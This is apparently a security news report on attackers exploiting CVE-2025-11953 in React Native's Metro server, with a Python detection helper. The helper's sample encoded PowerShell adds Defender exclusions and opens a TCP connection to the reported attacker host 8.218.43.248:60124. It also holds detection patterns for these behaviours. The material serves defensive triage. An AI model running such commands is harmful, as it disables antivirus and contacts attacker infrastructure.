Threat actors have been observed exploiting a critical flaw in the Metro development server bundled with the React Native CLI npm package, tracked as CVE-2025-11953 (Metro4Shell). The flaw carries a CVSS score of 9.8 and lets remote, unauthenticated attackers execute arbitrary operating system commands on the host running the server. According to VulnCheck, exploitation first appeared on 21 December 2025.
In the attack captured by the honeypot, the payload is a Base64-encoded PowerShell script that, among other actions, adds Microsoft Defender Antivirus exclusions for the current working directory and the temporary folder, then opens a raw TCP connection to an attacker-controlled host at 8.218.43[.]248:60124 to retrieve and execute a second stage. The downloaded binary is written in Rust and includes anti-analysis checks to hinder static inspection.
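As an added illustration (not VulnCheck's code and not the actual payload): a small Python triage helper that pulls a PowerShell -EncodedCommand out of a process-creation log line, decodes it the way PowerShell does (Base64 over UTF-16LE), and flags the behaviours described above. The encoded sample is constructed here to mimic those behaviours; the IP and port are the ones VulnCheck reported, while the log field name, the indicator regexes and the helper names are assumptions.

```python
import base64
import re

# Constructed sample script mimicking the behaviours in the report:
# Defender exclusions for the working and temp directories, then a raw
# TCP client to the reported host. This is NOT the real payload.
SAMPLE_PS = (
    'Add-MpPreference -ExclusionPath (Get-Location).Path; '
    'Add-MpPreference -ExclusionPath $env:TEMP; '
    '$c = New-Object System.Net.Sockets.TcpClient("8.218.43.248", 60124); '
    '$s = $c.GetStream()'
)


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation log lines (field name is an assumption).
SAMPLE_LOGS = [
    'CommandLine="C:\\Windows\\System32\\cmd.exe /c dir"',
    'CommandLine="powershell.exe -NoP -W Hidden -EncodedCommand '
    + encode_ps(SAMPLE_PS) + '"',
    'CommandLine="powershell.exe -Command Get-Process"',
]

# PowerShell accepts abbreviated forms of -EncodedCommand; longest first
# so the alternation does not stop at a prefix.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Behavioural indicators from the report (regexes are assumptions).
INDICATORS = {
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I),
    "raw_tcp_client": re.compile(r"System\.Net\.Sockets\.TcpClient", re.I),
    "temp_dir": re.compile(r"\$env:(?:TEMP|TMP)", re.I),
}

IP_PORT_RE = re.compile(
    r"TcpClient\(\s*[\"'](\d{1,3}(?:\.\d{1,3}){3})[\"']\s*,\s*(\d+)\s*\)")


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if no valid -EncodedCommand is present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Malformed Base64 or not UTF-16LE: treat as not decodable.
        return None


def analyse(cmdline: str) -> dict:
    """Decode one command line and report which indicators fired."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": False, "hits": [], "c2": None}
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    c2 = None
    m = IP_PORT_RE.search(script)
    if m:
        c2 = (m.group(1), int(m.group(2)))
    return {"decoded": True, "hits": hits, "c2": c2}


def triage(lines) -> list:
    """Return (index, result) for every line where at least one indicator fired."""
    out = []
    for i, line in enumerate(lines):
        r = analyse(line)
        if r["hits"]:
            out.append((i, r))
    return out


if __name__ == "__main__":
    for idx, result in triage(SAMPLE_LOGS):
        print(idx, result)
```

The point of decoding before matching is that an encoded command line shows none of these strings in the raw telemetry; searching for Add-MpPreference or TcpClient on the undecoded field would miss exactly the payload shape described here.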
VulnCheck noted activity from several IP addresses, including 5.109.182[.]231, 223.6.249[.]141, and 134.209.69[.]155, describing the campaign as operational rather than merely experimental.